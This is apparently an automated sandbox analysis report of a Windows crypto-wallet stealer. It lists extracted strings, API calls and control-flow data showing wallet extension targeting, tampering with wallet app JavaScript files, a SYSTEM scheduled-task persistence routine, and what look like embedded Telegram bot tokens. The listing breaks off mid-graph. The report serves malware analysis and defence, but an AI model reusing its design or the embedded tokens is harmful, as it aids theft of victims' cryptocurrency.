8 API calls 45330->45333 45331 7ff7abc2894c 45361 7ff7abc3ecb0 50 API calls 2 library calls 45331->45361 45335 7ff7abc28938 45333->45335 45335->45305 45336->45301 45337->45305 45339 7ff7abc56f84 __std_fs_code_page 47 API calls 45338->45339 45340 7ff7abc49401 45339->45340 45372 7ff7abc51774 47 API calls __std_fs_directory_iterator_open 45340->45372 45344 7ff7abc491e7 45343->45344 45345 7ff7abc491d0 45343->45345 45362 7ff7abc4914c 45344->45362 45369 7ff7abc51674 11 API calls memcpy_s 45345->45369 45348 7ff7abc491d5 45370 7ff7abc4cd10 47 API calls _invalid_parameter_noinfo 45348->45370 45351 7ff7abc491fa CreateThread 45352 7ff7abc28923 45351->45352 45353 7ff7abc4922a GetLastError 45351->45353 45352->45330 45352->45331 45371 7ff7abc515e8 11 API calls 2 library calls 45353->45371 45355 7ff7abc49237 45356 7ff7abc49246 45355->45356 45357 7ff7abc49240 CloseHandle 45355->45357 45358 7ff7abc49255 45356->45358 45359 7ff7abc4924f FreeLibrary 45356->45359 45357->45356 45360 7ff7abc58340 __free_lconv_mon 11 API calls 45358->45360 45359->45358 45360->45352 45363 7ff7abc587c4 memcpy_s 11 API calls 45362->45363 45364 7ff7abc4916e 45363->45364 45365 7ff7abc58340 __free_lconv_mon 11 API calls 45364->45365 45366 7ff7abc49178 45365->45366 45367 7ff7abc49181 GetModuleHandleExW 45366->45367 45368 7ff7abc4917d 45366->45368 45367->45368 45368->45351 45368->45352 45369->45348 45370->45352 45371->45355 45373 7ff7abc48635 45374 7ff7abc493f8 __GSHandlerCheck_EH 47 API calls 45373->45374 45375 7ff7abc4863a 45374->45375 45376 7ff7abc486ab 45375->45376 45377 7ff7abc48661 GetModuleHandleW 45375->45377 45385 7ff7abc48538 45376->45385 45377->45376 45383 7ff7abc4866e 45377->45383 45383->45376 45399 7ff7abc4875c GetModuleHandleExW 45383->45399 45405 7ff7abc51f64 EnterCriticalSection 45385->45405 45400 7ff7abc487b9 45399->45400 45401 7ff7abc48790 GetProcAddress 45399->45401 45402 7ff7abc487be FreeLibrary 45400->45402 45403 7ff7abc487c5 45400->45403 45404 7ff7abc487a2 45401->45404 45402->45403 45403->45376 45404->45400 45414 7ff7abc4d340 45415 7ff7abc4d374 45414->45415 45422 7ff7abc4d389 45414->45422 45440 7ff7abc51674 11 API calls memcpy_s 45415->45440 45417 7ff7abc4d379 45441 7ff7abc4cd10 47 API calls _invalid_parameter_noinfo 45417->45441 45420 7ff7abc42770 codecvt 8 API calls 45421 7ff7abc4d4d3 45420->45421 45433 7ff7abc4d4b8 45422->45433 45434 7ff7abc5d85c 45422->45434 45426 7ff7abc4d384 45426->45420 45428 7ff7abc4d66f 45429 7ff7abc4cd60 _invalid_parameter_noinfo_noreturn 17 API calls 45428->45429 45432 7ff7abc4d684 45429->45432 45433->45426 45442 7ff7abc51674 11 API calls memcpy_s 45433->45442 45435 7ff7abc5d86b 45434->45435 45436 7ff7abc4d5d2 45434->45436 45455 7ff7abc51f64 EnterCriticalSection 45435->45455 45443 7ff7abc5ca00 45436->45443 45440->45417 45441->45426 45442->45426 45444 7ff7abc5ca09 45443->45444 45445 7ff7abc4d5e3 45443->45445 45456 7ff7abc51674 11 API calls memcpy_s 45444->45456 45445->45428 45449 7ff7abc5ca30 45445->45449 45447 7ff7abc5ca0e 45457 7ff7abc4cd10 47 API calls _invalid_parameter_noinfo 45447->45457 45450 7ff7abc5ca39 45449->45450 45451 7ff7abc4d5f4 45449->45451 45458 7ff7abc51674 11 API calls memcpy_s 45450->45458 45451->45428 45451->45433 45453 7ff7abc5ca3e 45459 7ff7abc4cd10 47 API calls _invalid_parameter_noinfo 45453->45459 45456->45447 45457->45445 45458->45453 45459->45451 45460 7ff7abc38ce3 45461 7ff7abc42a38 std::_Facet_Register 50 API calls 45460->45461 45462 7ff7abc38ced 45461->45462 45463 7ff7abc42a38 std::_Facet_Register 50 API calls 45462->45463 45464 7ff7abc38d1b 45463->45464 45467 7ff7abc3a300 45464->45467 45468 7ff7abc38d41 45467->45468 45469 7ff7abc3a332 45467->45469 45470 7ff7abc42a38 std::_Facet_Register 50 API calls 45469->45470 45471 7ff7abc3a34a 45470->45471 45472 7ff7abc37910 50 API calls 45471->45472 45473 7ff7abc3a367 45472->45473 45474 7ff7abc37af0 50 API calls 45473->45474 45475 7ff7abc3a375 45474->45475 45476 7ff7abc3a300 50 API calls 45475->45476 45476->45468
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task__std_fs_code_page$ErrorLastWindow$CleanupConsoleCreateEnumFileModuleNameProcessesShowSnapshotStartupToolhelp32gethostname
                                                                                                                                                                          • String ID: terminated successfully.$128CF4C4A59C494144DAA119829B936CB9188E7B9DEFDBD4C0493780A8F822BE$13374559388926377$13374561731521706$13374995715847847$13375049800588985$13375110241046665$13375110296496201$13375110310591214$13375110321620290$13375110331747787$13375110344191823$13375110354575865$13375110364515390$18750852BBA140FCF329F0B2F98ED961304CD00CFEE1A5FF44762B97F2CE9E2F$1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f$23.12.21$2CDA9B33DF3854077ED63B9E912DD676B1892A6CDD18DC59790C40799E92D71B$6442787215$6C086D45706F3CDD6696F63808255BDDE719EA09BA60CBC98CDFEB55C8E94AE2$7340678156$7427009775$7776586945:AAFQTT1AD04IUpOLlf1aziN70zm8frk2JnQ$7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o$7867603719:AAEHk7Xd_OIqLVzZCPZMe4dTduUoZLQ8y2Y$805CF202E4DF8532D12BE509DE6794904E1C5D1F9FD783FD1507ADE27DEEE8AA$928279468E812A7C237289C39C5EA79668D93AE33F533F0C2198516C379764B7$</b>$</code>$<all_urls>$<b>Device Name:</b> $<b>IP Address:</b> $<b>Location:</b> $<b>Wallets:</b><code>$AF7CBA694AB611FF172D667CA5504FEBFB024ABC1637F2C63B8D72D67BBA3F5A$All users: $C:\Program Files\Google\Chrome\Extensions$C:\Program Files\Google\Chrome\Extensions\aholpfdialjgjfhomihkjbmgjidlcdno$C:\Program Files\Google\Chrome\Extensions\bfnaelmomeimhlpmgjnjophhpkkoljpa$C:\Program Files\Google\Chrome\Extensions\efbglgofoippbgcjepnhiblaibcnclgk$C:\Program Files\Google\Chrome\Extensions\egjidjbpglichdcondbcbdnbeeppgdph$C:\Program Files\Google\Chrome\Extensions\fnjhmkhhmkbjkkabndcnnogagogbneec$C:\Program Files\Google\Chrome\Extensions\hnfanknocfeofbddgcijnmhnfnkdnaad$C:\Program Files\Google\Chrome\Extensions\lpfcbjknijpeeillifnkikgncikgfhdo$C:\Program Files\Google\Chrome\Extensions\mcohilncbfahbmgdjkbpemcciiolgcge$C:\Program Files\Google\Chrome\Extensions\nkbihfbeogaeaoehlefnkodbefgpgknn$C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f$C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip$C:\Program Files\Windows Media Player\graph$C:\Program Files\Windows Media Player\graph$C:\Program Files\Windows Media Player\graph\graph.exe$C:\Users\$CAC5B4D0F32AA7D73E8AF05E83A188D2ECBA2B6186D06E54306BC2427BBCD68C$D304D4787A15629A04F596502ED8CF8C6031BF683EB7BCFDB1819D5F02C9667B$D:\@dev\Extensions\Ronin (Extension)$Directory and all contents deleted successfully: $Directory and its contents removed.$Directory don't exist $E0DC88925F64449E216468A174ED51BFEE4E6510DF40B0D2B576B9F4DFFA468D$Extensions Installed$Extraction complete.$Extraction failed.$Failed to delete the directory.$Failed to initialize Winsock.$Failed to open file: $Failed to open output ZIP file: $Failed to terminate $Graph$No wallet installed previously...$Nothing found$Process $Processing: $There are no users. Exit$ZIP Local File Header signature not found in file.$ZIP file extracted successfully to $\AppData\Local\Google\Chrome\User Data$action.onClicked$activeTab$active_permissions$aholpfdialjgjfhomihkjbmgjidlcdno$api$bfnaelmomeimhlpmgjnjophhpkkoljpa$efbglgofoippbgcjepnhiblaibcnclgk$egjidjbpglichdcondbcbdnbeeppgdph$exists$fnjhmkhhmkbjkkabndcnnogagogbneec$found chrome profiles$graph.exe$hardware wallet replace finished$hash$hifafgmccdpekplomjjkcfgodnhcellj$hnfanknocfeofbddgcijnmhnfnkdnaad$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$lpfcbjknijpeeillifnkikgncikgfhdo$mcohilncbfahbmgdjkbpemcciiolgcge$nkbihfbeogaeaoehlefnkodbefgpgknn$remove_all$tabs$user =
                                                                                                                                                                          • API String ID: 955434303-2808589617
                                                                                                                                                                          • Opcode ID: 6013d6701c57a6ec3b83585831c122150b92ab5ecd6b8ec1042cd3ebb0e7c6a0
                                                                                                                                                                          • Instruction ID: 51549b4767dffb65060f02a2c28e2ba3d63a909523cded50747dfed08345b105
                                                                                                                                                                          • Opcode Fuzzy Hash: 6013d6701c57a6ec3b83585831c122150b92ab5ecd6b8ec1042cd3ebb0e7c6a0
                                                                                                                                                                          • Instruction Fuzzy Hash: 5173B422A16BC295E730EF38DC457F86361FB95348F815232D65C5AABAEF789384C350
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$__std_fs_code_page$Concurrency::cancel_current_taskEnvironmentFileFindFirstVariable
                                                                                                                                                                          • String ID: Directory: $ $ (User: $ (User: None)$#$.exe$.lnk$.zip$Atomic$C:\Users\Public\Desktop\$Electrum$Exodus$Found directories:$Trazor Suite.exe$Trezor$Unzipped Hardware Wallet: $Wallet: $\resources\app\assets\index.js$\resources\app\assets\javascript.js$\resources\app\js\index.js$atomic.exe$remove$remove_all
                                                                                                                                                                          • API String ID: 1414602396-4070211798
                                                                                                                                                                          • Opcode ID: 738cbcb050f2cab1cf95462c7d617905f7a3f732f78e22ad0d0615d9c3ab8fc2
                                                                                                                                                                          • Instruction ID: 97de783a159f0f09542c2c7d64285d3e0d0ff4c8590ac6692626e95a4908e84e
                                                                                                                                                                          • Opcode Fuzzy Hash: 738cbcb050f2cab1cf95462c7d617905f7a3f732f78e22ad0d0615d9c3ab8fc2
                                                                                                                                                                          • Instruction Fuzzy Hash: F5E2A772A1D7C681EA20AB18F0447AEA361FB85794F914731DAAC07AFADF7CD184D710
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Variant$ClearInitStringUninitialize$_invalid_parameter_noinfo_noreturn$AllocConcurrency::cancel_current_taskErrorFreeLast$CreateFileInitializeInstanceModuleName
                                                                                                                                                                          • String ID: Cannot create action.$Cannot create boot trigger.$Cannot get Root Folder pointer.$Cannot get action collection.$Cannot get trigger collection.$Current process path: $Failed to connect to Task Scheduler.$Failed to create TaskService instance.$Failed to create task definition.$Failed to get process path. Error: $Failed to initialize COM library.$Failed to register task. Error: $Failed to set executable path.$MyBootTask$QueryInterface call failed for IExecAction.$SYSTEM$Task successfully registered to run at boot with admin rights.
                                                                                                                                                                          • API String ID: 1778526238-4048398458
                                                                                                                                                                          • Opcode ID: ea152884a3c04c83ddf0a4e16c80e2dcda702b86bd59945dd2e4724f464faa05
                                                                                                                                                                          • Instruction ID: 727d08a0921471e84a6b4b5d77970a742f80bf262365d8ca0d23f0b8c25dad98
                                                                                                                                                                          • Opcode Fuzzy Hash: ea152884a3c04c83ddf0a4e16c80e2dcda702b86bd59945dd2e4724f464faa05
                                                                                                                                                                          • Instruction Fuzzy Hash: BBE28672A19BC181EE219B29E444BAEA351FBC57A0F914232DA6D17BF9DF7CD080D710
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$__std_fs_code_page$Concurrency::cancel_current_task$__std_fs_convert_narrow_to_wide$ApisFile
                                                                                                                                                                          • String ID: $C:\Users\$Chrome User Data directory not found.$File parse failed$No extensions found in preferences.$No pinned extensions found or 'pinned_extensions' is not an array.$Warning: Pinned extension is not a string, skipping.$\AppData\Local\Google\Chrome\User Data$\Extensions$\Preferences$\Secure Preferences$developer_mode$directory_iterator::directory_iterator$exists$extensions$file_size$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$macs$name$pinned_extensions$profile$protection$settings$status
                                                                                                                                                                          • API String ID: 1036029176-3567150991
                                                                                                                                                                          • Opcode ID: f895663f30f34bc3b1b4a73626bc2ecd69c99ea22f02fdf9c398603cfbca353b
                                                                                                                                                                          • Instruction ID: ede8744895a74ccbdb768f55d412b6b856b927d59b7bf8061f8ec1f8ee158f3c
                                                                                                                                                                          • Opcode Fuzzy Hash: f895663f30f34bc3b1b4a73626bc2ecd69c99ea22f02fdf9c398603cfbca353b
                                                                                                                                                                          • Instruction Fuzzy Hash: 1323A362A1EBC282EA34EB18E4547EAE361FBC5740F854132DA8D47AB9DF7CD544CB10
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$__std_fs_code_page
                                                                                                                                                                          • String ID: Directories found:$\assets\js\popup.js$\assets\js\script.js$\js\script.js$\pass.js$\popup.js$\reset.js$\scripts\phrase.js$aholpfdialjgjfhomihkjbmgjidlcdno$bfnaelmomeimhlpmgjnjophhpkkoljpa$efbglgofoippbgcjepnhiblaibcnclgk$egjidjbpglichdcondbcbdnbeeppgdph$fnjhmkhhmkbjkkabndcnnogagogbneec$hifafgmccdpekplomjjkcfgodnhcellj$hnfanknocfeofbddgcijnmhnfnkdnaad$lpfcbjknijpeeillifnkikgncikgfhdo$mcohilncbfahbmgdjkbpemcciiolgcge$nkbihfbeogaeaoehlefnkodbefgpgknn
                                                                                                                                                                          • API String ID: 4261731725-745990702
                                                                                                                                                                          • Opcode ID: eed29142c0b17473f8e06e9c831029cfc41bd86864cffae7e9f34e7c1f3a7299
                                                                                                                                                                          • Instruction ID: 439b6abe43a3ad55bb53c090fe7796c9f9dfacd95505911a2020f008ad37d3e0
                                                                                                                                                                          • Opcode Fuzzy Hash: eed29142c0b17473f8e06e9c831029cfc41bd86864cffae7e9f34e7c1f3a7299
                                                                                                                                                                          • Instruction Fuzzy Hash: 3AD2BF22F19B8285FB00EB68D0047BD6362AB55798F829731DE6C176FADF78E1C49350
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: __std_fs_code_page
                                                                                                                                                                          • String ID: "$Extracted: $Failed to create output file: $Failed to extract entry: $Failed to get entry info for index: $Failed to initialize ZIP archive: $Failed to open ZIP file: $create_directories$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                          • API String ID: 1686256323-3304824404
                                                                                                                                                                          • Opcode ID: d314fcfd26f6d6dfe77f394f4801bb09af6696e241a6e80ffde583f199b1b72e
                                                                                                                                                                          • Instruction ID: 5daab467ead71886b0dea79436d90e072f80be242db7b56bf588a3f2c5788ed7
                                                                                                                                                                          • Opcode Fuzzy Hash: d314fcfd26f6d6dfe77f394f4801bb09af6696e241a6e80ffde583f199b1b72e
                                                                                                                                                                          • Instruction Fuzzy Hash: 1DA2D472B15B8685EB14AF2CD444BEDA361FB44798F914632DA6D17AFADF38E180C310
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task__std_fs_code_page$__std_fs_convert_narrow_to_wide$ApisFile
                                                                                                                                                                          • String ID: .lck$.zip$C:\Program Files\Google\Chrome\Extensions$Download failed$Extensions count: $Profiles count: $create_directories$exists$remove
                                                                                                                                                                          • API String ID: 3708190391-83527870
                                                                                                                                                                          • Opcode ID: e2076c5f7d4301a157191b0b03ad3eb607ac393870201ef6c63db0fd2655afcf
                                                                                                                                                                          • Instruction ID: 5193dc6dba4751d168976b9f7f5289896d714732c3bd253eb5d667298f2fa313
                                                                                                                                                                          • Opcode Fuzzy Hash: e2076c5f7d4301a157191b0b03ad3eb607ac393870201ef6c63db0fd2655afcf
                                                                                                                                                                          • Instruction Fuzzy Hash: 1CA2F572A15B8285EB10EF28E4447ADA761FB85798F914331EA6C17BF9EF38D580D310

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 4249 7ff7abc13ce0-7ff7abc13db7 call 7ff7abc43600 call 7ff7abc244a0 * 2 InternetOpenA 4256 7ff7abc13dbd-7ff7abc13e04 call 7ff7abc21b10 call 7ff7abc21dc0 call 7ff7abc1f4e0 * 2 4249->4256 4257 7ff7abc13eaf-7ff7abc13ed8 InternetOpenUrlA 4249->4257 4296 7ff7abc13e3b-7ff7abc13e46 4256->4296 4297 7ff7abc13e06-7ff7abc13e1a 4256->4297 4259 7ff7abc13eda-7ff7abc13f1e call 7ff7abc21b10 call 7ff7abc21dc0 InternetCloseHandle call 7ff7abc1f4e0 * 2 4257->4259 4260 7ff7abc13f24-7ff7abc13f66 InternetReadFile 4257->4260 4259->4260 4262 7ff7abc13f68 4260->4262 4263 7ff7abc13fde-7ff7abc141e2 InternetCloseHandle * 2 call 7ff7abc699f0 call 7ff7abc21370 call 7ff7abc21080 call 7ff7abc20980 call 7ff7abc38bc0 * 2 call 7ff7abc31f30 call 7ff7abc327f0 4260->4263 4266 7ff7abc13f70-7ff7abc13f78 4262->4266 4338 7ff7abc141e8-7ff7abc14273 call 7ff7abc38bc0 call 7ff7abc374c0 call 7ff7abc392e0 call 7ff7abc38c50 call 7ff7abc38e50 call 7ff7abc37c70 4263->4338 4339 7ff7abc14a52-7ff7abc14a93 call 7ff7abc21b10 call 7ff7abc26670 call 7ff7abc21dc0 4263->4339 4266->4263 4271 7ff7abc13f7a-7ff7abc13f80 4266->4271 4275 7ff7abc14c51-7ff7abc14c56 call 7ff7abc428a0 4271->4275 4276 7ff7abc13f86-7ff7abc13f9c 4271->4276 4288 7ff7abc14c57-7ff7abc14c5c call 7ff7abc4cd30 4275->4288 4281 7ff7abc13fa0-7ff7abc13fa8 4276->4281 4281->4281 4286 7ff7abc13faa-7ff7abc13fdc call 7ff7abc208c0 InternetReadFile 4281->4286 4286->4263 4286->4266 4306 7ff7abc14c5d-7ff7abc14c62 call 7ff7abc4cd30 4288->4306 4300 7ff7abc13e48-7ff7abc13e5c 4296->4300 4301 7ff7abc13e7c-7ff7abc13eae call 7ff7abc42770 4296->4301 4303 7ff7abc13e1c-7ff7abc13e2f 4297->4303 4304 7ff7abc13e35-7ff7abc13e3a call 7ff7abc42790 4297->4304 4307 7ff7abc13e77 call 7ff7abc42790 4300->4307 4308 7ff7abc13e5e-7ff7abc13e71 4300->4308 4303->4304 4311 7ff7abc14c3f-7ff7abc14c44 call 7ff7abc4cd30 4303->4311 4304->4296 4323 7ff7abc14c63-7ff7abc14c68 call 7ff7abc4cd30 4306->4323 4307->4301 4308->4307 4314 7ff7abc14c45-7ff7abc14c4a call 7ff7abc4cd30 4308->4314 4311->4314 4327 7ff7abc14c4b-7ff7abc14c50 call 7ff7abc4cd30 4314->4327 4332 7ff7abc14c69-7ff7abc14c6e call 7ff7abc4cd30 4323->4332 4327->4275 4342 7ff7abc14c6f-7ff7abc14c74 call 7ff7abc4cd30 4332->4342 4382 7ff7abc142da-7ff7abc142e3 4338->4382 4383 7ff7abc14275-7ff7abc14280 4338->4383 4362 7ff7abc14a98-7ff7abc14a9e 4339->4362 4351 7ff7abc14c75-7ff7abc14c7a call 7ff7abc4cd30 4342->4351 4358 7ff7abc14c7b-7ff7abc14c80 call 7ff7abc4cd30 4351->4358 4367 7ff7abc14c81-7ff7abc14c86 call 7ff7abc4cd30 4358->4367 4365 7ff7abc14aac-7ff7abc14abd 4362->4365 4366 7ff7abc14aa0-7ff7abc14aa7 call 7ff7abc4c0fc 4362->4366 4370 7ff7abc14ae8-7ff7abc14b6d call 7ff7abc1cf20 call 7ff7abc40ad8 4365->4370 4371 7ff7abc14abf-7ff7abc14ae7 call 7ff7abc42a74 call 7ff7abc42790 4365->4371 4366->4365 4381 7ff7abc14c87-7ff7abc14c8f call 7ff7abc4cd30 4367->4381 4394 7ff7abc14b6f-7ff7abc14b83 4370->4394 4395 7ff7abc14ba3-7ff7abc14bc7 4370->4395 4371->4370 4386 7ff7abc14317-7ff7abc1433a call 7ff7abc38de0 4382->4386 4387 7ff7abc142e5-7ff7abc142f7 4382->4387 4390 7ff7abc14282-7ff7abc14296 4383->4390 4391 7ff7abc142b6-7ff7abc142d7 4383->4391 4409 7ff7abc1433c-7ff7abc14364 call 7ff7abc42a74 call 7ff7abc42790 4386->4409 4410 7ff7abc14365-7ff7abc14377 call 7ff7abc38de0 4386->4410 4392 7ff7abc142f9-7ff7abc1430c 4387->4392 4393 7ff7abc14312 call 7ff7abc42790 4387->4393 4398 7ff7abc14298-7ff7abc142ab 4390->4398 4399 7ff7abc142b1 call 7ff7abc42790 4390->4399 4391->4382 4392->4327 4392->4393 4393->4386 4402 7ff7abc14b9e call 7ff7abc42790 4394->4402 4403 7ff7abc14b85-7ff7abc14b98 4394->4403 4405 7ff7abc14bc9-7ff7abc14bdd 4395->4405 4406 7ff7abc14bfa-7ff7abc14c05 4395->4406 4398->4327 4398->4399 4399->4391 4402->4395 4403->4381 4403->4402 4411 7ff7abc14bdf-7ff7abc14bf2 4405->4411 4412 7ff7abc14bf4-7ff7abc14bf9 call 7ff7abc42790 4405->4412 4406->4301 4407 7ff7abc14c0b-7ff7abc14c1f 4406->4407 4407->4307 4414 7ff7abc14c25-7ff7abc14c38 4407->4414 4409->4410 4421 7ff7abc14379-7ff7abc1439c call 7ff7abc42a74 call 7ff7abc42790 4410->4421 4422 7ff7abc143a1-7ff7abc145d2 call 7ff7abc38bc0 call 7ff7abc374c0 call 7ff7abc392e0 call 7ff7abc38c50 call 7ff7abc38e50 call 7ff7abc37c70 call 7ff7abc38bc0 call 7ff7abc374c0 call 7ff7abc392e0 call 7ff7abc38c50 call 7ff7abc38e50 call 7ff7abc37c70 call 7ff7abc38bc0 call 7ff7abc374c0 call 7ff7abc392e0 call 7ff7abc38c50 call 7ff7abc38e50 call 7ff7abc37c70 call 7ff7abc208c0 call 7ff7abc25ef0 call 7ff7abc208c0 call 7ff7abc25ef0 4410->4422 4411->4311 4411->4412 4412->4406 4414->4314 4418 7ff7abc14c3a 4414->4418 4418->4307 4421->4422 4472 7ff7abc14608-7ff7abc14626 4422->4472 4473 7ff7abc145d4-7ff7abc145e8 4422->4473 4476 7ff7abc14628-7ff7abc14639 4472->4476 4477 7ff7abc1465a-7ff7abc14663 4472->4477 4474 7ff7abc145ea-7ff7abc145fd 4473->4474 4475 7ff7abc14603 call 7ff7abc42790 4473->4475 4474->4288 4474->4475 4475->4472 4479 7ff7abc1463b-7ff7abc1464e 4476->4479 4480 7ff7abc14654-7ff7abc14659 call 7ff7abc42790 4476->4480 4481 7ff7abc14697-7ff7abc146b3 4477->4481 4482 7ff7abc14665-7ff7abc14677 4477->4482 4479->4306 4479->4480 4480->4477 4483 7ff7abc146e8-7ff7abc146f0 4481->4483 4484 7ff7abc146b5-7ff7abc146c7 4481->4484 4486 7ff7abc14679-7ff7abc1468c 4482->4486 4487 7ff7abc14692 call 7ff7abc42790 4482->4487 4491 7ff7abc146f2-7ff7abc14703 4483->4491 4492 